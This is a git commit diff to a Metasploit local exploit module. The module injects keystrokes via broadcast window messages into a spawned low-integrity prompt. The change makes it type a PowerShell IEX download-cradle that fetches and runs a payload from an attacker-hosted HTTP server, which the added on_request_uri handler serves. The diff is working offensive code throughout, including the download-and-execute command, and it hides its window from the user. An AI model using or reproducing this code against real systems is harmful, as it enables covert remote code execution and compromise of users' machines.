Working with psh download
parent
b99ad41a64
commit
d3f3e5d63e
|
@ -13,6 +13,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
|
include Msf::Exploit::Remote::HttpServer
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super( update_info( info,
|
super( update_info( info,
|
||||||
|
@ -73,10 +74,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
bscan = 0x81 + number
|
bscan = 0x81 + number
|
||||||
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
|
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
|
||||||
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
|
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
|
||||||
sleep(0.01)
|
|
||||||
client.railgun.user32.keybd_event(vk, bscan, 0, 0)
|
client.railgun.user32.keybd_event(vk, bscan, 0, 0)
|
||||||
sleep(0.01)
|
|
||||||
|
|
||||||
client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
|
client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
|
||||||
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
|
client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
|
||||||
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
|
client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
|
||||||
|
@ -85,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
def count_cmd_procs
|
def count_cmd_procs
|
||||||
count = 0
|
count = 0
|
||||||
client.sys.process.each_process do |proc|
|
client.sys.process.each_process do |proc|
|
||||||
if proc['name'] == 'cmd.exe'
|
if proc['name'] == 'powershell.exe'
|
||||||
count += 1
|
count += 1
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -97,11 +95,12 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
def cleanup
|
def cleanup
|
||||||
if datastore['SPAWN_PROMPT']
|
if datastore['SPAWN_PROMPT']
|
||||||
vprint_status("Rehiding window...")
|
vprint_status("Rehiding window...")
|
||||||
client.railgun.user32.ShowWindow(@hwin, 0)
|
#client.railgun.user32.ShowWindow(@hwin, 0)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def primer
|
||||||
|
start_service
|
||||||
# syinfo is only on meterpreter sessions
|
# syinfo is only on meterpreter sessions
|
||||||
e = "V2FrZSB1cCwgTmVvLi4uDQpUaGUgTWF0cml4IGhhcyB5b3UuLi4NCkZvbGxv\ndyB0aGUgV2hpdGUgUmFiYml0Lg=="
|
e = "V2FrZSB1cCwgTmVvLi4uDQpUaGUgTWF0cml4IGhhcyB5b3UuLi4NCkZvbGxv\ndyB0aGUgV2hpdGUgUmFiYml0Lg=="
|
||||||
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
|
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
|
||||||
|
@ -111,13 +110,13 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
if @hwin == nil
|
if @hwin == nil
|
||||||
@hwin = client.railgun.user32.GetForegroundWindow()['return']
|
@hwin = client.railgun.user32.GetForegroundWindow()['return']
|
||||||
end
|
end
|
||||||
#client.railgun.user32.ShowWindow(@hwin, 0)
|
client.railgun.user32.ShowWindow(@hwin, 0)
|
||||||
#client.railgun.user32.ShowWindow(@hwin, 5)
|
client.railgun.user32.ShowWindow(@hwin, 5)
|
||||||
|
|
||||||
# Spawn low integrity cmd.exe
|
# Spawn low integrity cmd.exe
|
||||||
print_status("Spawning Low Integrity Cmd Prompt")
|
print_status("Spawning Low Integrity Cmd Prompt")
|
||||||
windir = client.fs.file.expand_path("%windir%")
|
windir = client.fs.file.expand_path("%windir%")
|
||||||
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
|
li_cmd_pid = client.sys.process.execute("powershell.exe", nil, {'Hidden' => false }).pid
|
||||||
|
|
||||||
count = count_cmd_procs
|
count = count_cmd_procs
|
||||||
spawned = false
|
spawned = false
|
||||||
|
@ -141,15 +140,24 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
|
print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
|
||||||
payload = Rex::Text.decode_base64(e) if datastore['EEGG']
|
data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
|
||||||
payload.each_char do |c|
|
url = get_uri()
|
||||||
print c
|
download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
|
||||||
|
command = download_and_run
|
||||||
|
command = Rex::Text.decode_base64(e) if datastore['EEGG']
|
||||||
|
command.each_char do |c|
|
||||||
|
print c if command.length < 200
|
||||||
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
|
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0)
|
||||||
sleep(0.01)
|
|
||||||
end
|
end
|
||||||
print_line
|
print_line
|
||||||
print_status("Executing command...")
|
print_status("Executing command...")
|
||||||
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
|
client.railgun.user32.SendMessageA('HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def on_request_uri(cli, request)
|
||||||
|
print_status("Delivering Payload")
|
||||||
|
data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
|
||||||
|
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue